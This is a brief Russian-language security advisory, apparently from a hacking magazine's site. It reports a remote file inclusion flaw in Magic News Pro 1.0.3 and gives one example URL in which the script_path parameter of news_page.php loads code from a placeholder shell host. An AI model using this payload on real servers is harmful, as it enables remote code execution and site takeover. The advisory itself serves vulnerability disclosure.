Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Reamday Enterprises Magic News Pro 1.0.3
Злоумышленник может включить и выполнить произвольный PHP код.
Пример:
http://sitename.com/news/scripts/news_page.php?script_path=http://SHELLURL.COM?